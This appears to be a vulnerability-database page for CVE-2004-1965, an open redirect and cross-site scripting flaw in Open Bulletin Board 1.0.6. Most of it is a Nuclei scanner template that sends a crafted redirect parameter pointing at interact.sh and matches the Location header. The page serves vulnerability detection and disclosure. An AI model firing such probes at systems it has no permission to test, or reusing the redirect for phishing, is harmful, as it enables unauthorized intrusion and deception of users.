CVE-2004-1965: Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS

2025-08-01 Open Bulletin Board PoC Public

Description

Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php.

PoC

id: CVE-2004-1965

info:
  name: Open Bulletin Board (OpenBB) v1.0.6 - Open Redirect/XSS
  author: ctflearner
  severity: medium
  description: |
    Multiple cross-site scripting (XSS) vulnerabilities in Open Bulletin Board (OpenBB) 1.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) redirect parameter to member.php, (2) to parameter to myhome.php (3) TID parameter to post.php, or (4) redirect parameter to index.php.
  impact: |
    Successful exploitation of these vulnerabilities could lead to unauthorized access, phishing attacks, and potential data theft.
  remediation: |
    Upgrade to a patched version of Open Bulletin Board (OpenBB) or apply necessary security patches to mitigate the vulnerabilities.
  reference:
    - https://www.exploit-db.com/exploits/24055
    - https://nvd.nist.gov/vuln/detail/CVE-2004-1965
    - http://marc.info/?l=bugtraq&m=108301983206107&w=2
    - https://exchange.xforce.ibmcloud.com/vulnerabilities/15966
    - https://github.com/POORVAJA-195/Nuclei-Analysis-main
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
    cvss-score: 4.3
    cve-id: CVE-2004-1965
    cwe-id: NVD-CWE-Other
    epss-score: 0.09001
    epss-percentile: 0.94998
    cpe: cpe:2.3:a:openbb:openbb:1.0.0_beta1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: openbb
    product: openbb
  tags: cve,cve2004,redirect,xss,openbb,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?redirect=http%3A%2F%2Fwww.interact.sh"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$'
# digest: 4a0a00473045022100bfb53c4dfa0a1a11884d26ae4d765a817bd8f6a7282cc5efb245690a5602962a022067e77ef9c826655f852d222b0a6447e792d1de5953f76cbd535bb8654eb3b1bc:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities